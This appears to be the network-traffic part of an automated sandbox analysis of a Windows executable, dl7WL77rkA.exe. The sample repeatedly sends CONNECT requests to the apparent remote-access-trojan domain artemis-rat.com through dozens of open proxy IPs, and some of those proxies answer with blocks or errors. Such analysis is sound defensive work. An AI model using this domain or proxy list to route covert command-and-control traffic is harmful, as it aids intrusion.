                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.641019106 CET1254INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid/3.5.28
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 952
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            X-Cache: MISS from ah_test
                                                                                                                                                                                                                                                            Via: 1.1 ah_test (squid/3.5.28)
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://artemis-rat.com/*">https://artemis-rat.com/*</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Mon, 11 Mar 2024 02:30:43 GMT</p></div></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1303192.168.2.553512211.222.252.18781933876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.315706015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.594937086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.920937061 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1314192.168.2.55210547.254.90.12588883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.413516998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1315192.168.2.55352143.131.245.216156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.414113045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1316192.168.2.553536173.249.33.122648733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.416575909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.092611074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.092905998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.092874050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.889549017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.702008009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.405179024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1317192.168.2.552920125.141.133.4755663876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.416896105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.592334986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:55.443736076 CET755INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>Tor is not an HTTP Proxy</title></head><body><h1>Tor is not an HTTP Proxy</h1><p>It appears you have configured your web browser to use Tor as an HTTP proxy.This is not correct: Tor is a SOCKS proxy, not an HTTP proxy.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.... Plus this comment, to make the body response more than 512 bytes, so IE will be willing to display it. Comment comment comment comment comment comment comment comment comment comment comment comment.--></p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:05.676084042 CET755INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>Tor is not an HTTP Proxy</title></head><body><h1>Tor is not an HTTP Proxy</h1><p>It appears you have configured your web browser to use Tor as an HTTP proxy.This is not correct: Tor is a SOCKS proxy, not an HTTP proxy.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.... Plus this comment, to make the body response more than 512 bytes, so IE will be willing to display it. Comment comment comment comment comment comment comment comment comment comment comment comment.--></p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:17.706581116 CET755INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>Tor is not an HTTP Proxy</title></head><body><h1>Tor is not an HTTP Proxy</h1><p>It appears you have configured your web browser to use Tor as an HTTP proxy.This is not correct: Tor is a SOCKS proxy, not an HTTP proxy.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.... Plus this comment, to make the body response more than 512 bytes, so IE will be willing to display it. Comment comment comment comment comment comment comment comment comment comment comment comment.--></p></body></html>
Mar 11, 2024 03:32:42.536922932 CET | 755 | IN | HTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>Tor is not an HTTP Proxy</title></head><body><h1>Tor is not an HTTP Proxy</h1><p>It appears you have configured your web browser to use Tor as an HTTP proxy.This is not correct: Tor is a SOCKS proxy, not an HTTP proxy.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.... Plus this comment, to make the body response more than 512 bytes, so IE will be willing to display it. Comment comment comment comment comment comment comment comment comment comment comment comment.--></p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1318192.168.2.552080162.241.50.179537553876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.416896105 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.405189037 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1319192.168.2.552831199.116.114.1141453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.417576075 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1320192.168.2.55198362.171.169.37584023876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.421966076 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.514465094 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.514730930 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1321192.168.2.552956184.170.245.14841453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.422822952 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1322192.168.2.553652140.84.176.2464433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.431906939 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1323192.168.2.55353945.11.95.16660043876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.435878038 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.862637043 CET | 39 | IN | HTTP/1.0 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1324192.168.2.553653140.84.176.2464433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.437128067 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1325192.168.2.551858148.66.130.5378303876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.437954903 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1326192.168.2.553655140.84.176.2464433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.440387964 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1327192.168.2.55354065.21.255.19731283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.441498041 CET | 193 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Mar 11, 2024 03:30:43.769501925 CET | 75 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:43 GMT
Content-Length: 0
Mar 11, 2024 03:30:44.132849932 CET | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1328192.168.2.553656140.84.176.2464433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.443532944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1329192.168.2.553582104.16.107.206803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.453322887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.607558966 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1330192.168.2.553600104.23.107.172803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.460208893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.622806072 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1331192.168.2.55354145.233.2.141533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.477221012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1332192.168.2.553613172.67.14.237803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.477225065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.632417917 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1333192.168.2.551909193.30.13.189993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.477380991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.862407923 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1334192.168.2.55354247.74.226.850013876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.477448940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1335192.168.2.553559192.210.228.28156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.481389046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1336192.168.2.55307089.46.249.14888883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.495727062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.592600107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.594937086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.701955080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.200769901 CET228INHTTP/1.0 502 Bad Gateway
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h2>502 Bad Gateway</h2><h3>Host Not Found or connection failed</h3></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
